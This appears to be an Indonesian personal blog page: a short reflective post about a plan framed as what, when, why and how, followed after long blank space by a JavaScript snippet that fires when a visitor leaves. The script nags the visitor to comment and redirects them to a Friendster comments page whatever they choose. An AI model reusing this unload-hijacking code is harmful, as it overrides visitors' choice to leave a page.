Jawaban "APA"..sangatlah mudah. Baru-baru ini aku merencanakan sesuatu yang sangat menakjubkan dan sempurna. Itu juga jawaban dari "KAPAN".
Untuk jawaban dari "KENAPA", selain motivasi kehidupan yang sudah jelas semua orang menginginkannya, serta jawaban dari arti hidup yang aku jalani. Bagiku sangatkah sederhana karna aku bisa melakukannya.
Tinggal jawaban dari "BAGAIMANA"..
Dan disitu lah seperti yang di katakan pendongen, terdapat rintangan yang 

harus aku lewati. (Tyo)


Rahasia ku (tolong jangan di klik)..

 




Bookmark and Share























































































































































































































































































































































































































































function goodbye()
{
var r=confirm("Mo kmana ... "+pageViewerFName+"???. Klo mo isi testy Klik OK yeh! '." + '\n' + "Testynya pasti aku bales. " + '\n' + "klo cuma View aja si gak seru ... ");
if (r==true)
{
window.location="http://www.friendster.com/comments.php?uid=35146031";
}
if (r==false)
{
alert("Yak ampun pelit nya ........"+pageViewerFName+"!! " + '\n' + "klo view doang gak seru" + '\n' + "Udah ...." + '\n' + "kamu isi comment dlo sana!");
}
{
window.location="http://www.friendster.com/comments.php?uid=35146031";
}
}
parent.window.onunload=goodbye;

Followers


junkelse by Junkelse. Powered by Blogger and Supported by kuchino.blogspot.com